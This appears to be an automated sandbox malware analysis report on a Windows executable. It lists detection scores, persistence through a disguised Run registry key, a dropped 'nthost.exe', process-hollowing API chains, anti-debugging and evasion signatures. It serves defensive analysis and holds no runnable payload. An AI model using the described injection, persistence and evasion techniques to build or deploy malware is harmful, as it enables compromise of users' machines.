
Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 33765
Start time: 19:10:19
Joe Sandbox Product: CloudBasic
Start date: 08.10.2017
Overall analysis duration: 0h 9m 58s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: obtG43AWHP.bin (renamed file extension from bin to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection: MAL
Classification: mal80.evad.winEXE@77/2@0/0
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 230
  • Number of non-executed functions: 519
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 92.9% (good quality ratio 91.2%)
  • Quality average: 86.3%
  • Quality standard deviation: 23%
Cookbook Comments:
  • Stop behavior analysis, all processes terminated
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.


Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 80 | 0 - 100 | Report FP / FN | malicious


Confidence

Strategy | Score | Range | Further Analysis Required?
Threshold | 5 | 0 - 5 | false


Classification

Signature Overview



AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe | virustotal: Detection: 46%
Antivirus detection for submitted file
Source: obtG43AWH.exe | virustotal: Detection: 46%

DDoS:

Too many similar processes found
Source: obtG43AWHP.exe | Process created: 71

Boot Survival:

Creates an autostart registry key
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run DX9 C++RTL
Creates autostart registry keys with suspicious names
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run DX9 C++RTL

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\obtG43AWHP.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Code function: 1_2_030073AC LoadLibraryW, GetProcAddress, GetProcAddress, EncodePointer, EncodePointer, GetProcAddress, EncodePointer, GetProcAddress, EncodePointer, GetProcAddress, EncodePointer, GetProcAddress, EncodePointer, DecodePointer, DecodePointer, DecodePointer, DecodePointer, DecodePointer, DecodePointer
PE file contains an invalid checksum
Source: obtG43AWH.exe | Static PE information: real checksum: 0x8972b should be: 0x81a60
Source: nthost.exe.36.dr | Static PE information: real checksum: 0x8972b should be: 0x81a60
Uses code obfuscation techniques (call, push, ret)

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Code function: 2_2_00404E08 GetModuleHandleA, GetProcAddress, lstrcpyn, lstrcpyn, lstrcpyn, FindFirstFileA, FindClose, lstrlen, lstrcpyn, lstrlen, lstrcpyn

System Summary:

Classification label
Source: classification engine | Classification label: mal80.evad.winEXE@77/2@0/0
Contains functionality to check free disk space
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Code function: 2_2_004076D4 GetDiskFreeSpaceA
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Code function: 2_2_0040BA10 FreeResource
Creates files inside the user directory
Source: C:\Users\user\Desktop\obtG43AWHP.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\DirectX
Launches a second explorer.exe instance
Source: unknown | Process created: C:\Windows\explorer.exe
PE file has an executable .text section and no other executable section
Source: obtG43AWH.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using Borland Delphi (Probably coded in Delphi)
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Key opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe | Key opened: HKEY_USERS\Software\Borland\Delphi\Locales
Reads ini files
Source: C:\Users\user\Desktop\obtG43AWHP.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)
Source: obtG43AWH.exe | Virustotal: hash found
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe'
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 0
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 1
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 2
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 3
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 4
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 5
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 6
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 7
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 8
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 9
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 10
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 11
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 12
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 13
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 14
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 15
Source: unknown | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 16
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe 'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe'
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe'
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 0
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 1
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 2
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 3
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 4
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 5
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 6
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 7
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 8
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 9
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 10
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 11
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 12
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 13
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 14
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 15
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 16
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe 'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe 'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe | Process created: unknown unknown
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Contains functionality to call native functions
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Code function: 1_2_0027E080 VirtualAlloc, GetModuleFileNameA, CreateProcessA, VirtualAlloc, ReadProcessMemory, VirtualAllocEx, NtWriteVirtualMemory, NtWriteVirtualMemory, WriteProcessMemory, SetThreadContext, ResumeThread
Source: C:\Users\user\Desktop\obtG43AWHP.exe | Code function: 2_2_00417F5C CreateProcessA, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx, VirtualAllocEx, VirtualAllocEx, WriteProcessMemory, WriteProcessMemory, SetThreadContext, ResumeThread, WaitForSingleObject, TerminateThread, CloseHandle, VirtualFree, TerminateProcess
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00405CF0 appears 90 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00411DBC appears 105 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00401268 appears 60 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 004118D4 appears 105 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040A628 appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00407F03 appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00217214 appears 33 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040CA14 appears 315 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 03005030 appears 38 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0021589C appears 54 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040539C appears 75 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00404194 appears 60 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00401314 appears 75 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 004038E8 appears 105 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00403894 appears 60 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040F48C appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00281D0C appears 42 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00405A90 appears 150 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040346C appears 210 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040450C appears 105 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00211D0C appears 42 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00287214 appears 33 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00405C80 appears 255 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0025589C appears 36 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00403EAC appears 405 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0028589C appears 54 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 004111AC appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00403114 appears 105 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00408974 appears 165 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040DB18 appears 165 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00405C78 appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040345C appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00403E88 appears 1095 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00401260 appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00406EFC appears 60 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0029589C appears 36 times

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0027E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,1_2_0027E080
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe base: 400000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\obtG43AWHP.exeThread register set: target process: 3120

Anti Debugging:

Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_03003F30 SetUnhandledExceptionFilter,1_2_03003F30
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_03003CD8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_03003CD8
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_03006BA0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_03006BA0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_03003CD8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_03003CD8
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_03006BA0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_03006BA0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_03003F30 SetUnhandledExceptionFilter,2_2_03003F30
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_03003CD8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_03003CD8
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_030073AC LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_030073AC
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0027DFB2 push dword ptr fs:[00000030h]1_2_0027DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 3_2_0029DFB2 push dword ptr fs:[00000030h]3_2_0029DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 5_2_0020DFB2 push dword ptr fs:[00000030h]5_2_0020DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 7_2_0028DFB2 push dword ptr fs:[00000030h]7_2_0028DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 9_2_0028DFB2 push dword ptr fs:[00000030h]9_2_0028DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 11_2_001ADFB2 push dword ptr fs:[00000030h]11_2_001ADFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 13_2_002DDFB2 push dword ptr fs:[00000030h]13_2_002DDFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 15_2_0020DFB2 push dword ptr fs:[00000030h]15_2_0020DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 17_2_0037DFB2 push dword ptr fs:[00000030h]17_2_0037DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 19_2_0018DFB2 push dword ptr fs:[00000030h]19_2_0018DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 21_2_0024DFB2 push dword ptr fs:[00000030h]21_2_0024DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 23_2_0020DFB2 push dword ptr fs:[00000030h]23_2_0020DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 25_2_0027DFB2 push dword ptr fs:[00000030h]25_2_0027DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 27_2_0024DFB2 push dword ptr fs:[00000030h]27_2_0024DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 29_2_0027DFB2 push dword ptr fs:[00000030h]29_2_0027DFB2

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 4_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,4_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 6_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 8_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,8_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 10_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,10_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 12_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 14_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,14_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 16_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,16_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 18_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,18_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 20_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,20_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 22_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,22_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 24_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,24_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 26_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,26_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 28_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,28_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 30_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,30_2_00404E08
Contains functionality to query system information
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_0041844E GetSystemInfo,2_2_0041844E
Program exit points
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_1-19518
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_1-18629
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_1-19034
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_1-19038
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_1-19161
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_2-17672
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_2-17610
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_4-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_6-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_8-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_10-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_12-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_14-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_16-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_18-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_20-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_22-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_24-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end node
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\obtG43AWHP.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-18709
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 4.4 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 3720Thread sleep time: -60000s >= -60s

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess information set: NOOPENFILEERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_00417A70 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00417A70

Language, Device and Operating System Detection:

Contains functionality to query local / system time
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0300521F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_0300521F
Contains functionality to query windows version
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_0040AD2C GetVersionExA,2_2_0040AD2C
Queries the cryptographic machine GUID
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality locales information (e.g. system language)
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: _strlen,ShellExecuteA,ShellAboutW,ExtractIconA,GetColorSpace,GetLogColorSpaceA,ChoosePixelFormat,SetICMMode,GetPrivateProfileSectionNamesA,GetCalendarInfoW,GetLocaleInfoW,GetModuleHandleW,LocalAlloc,VirtualProtect,GetTickCount,1_2_0300966F
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,2_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,2_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,2_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,2_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,2_2_00409DFC
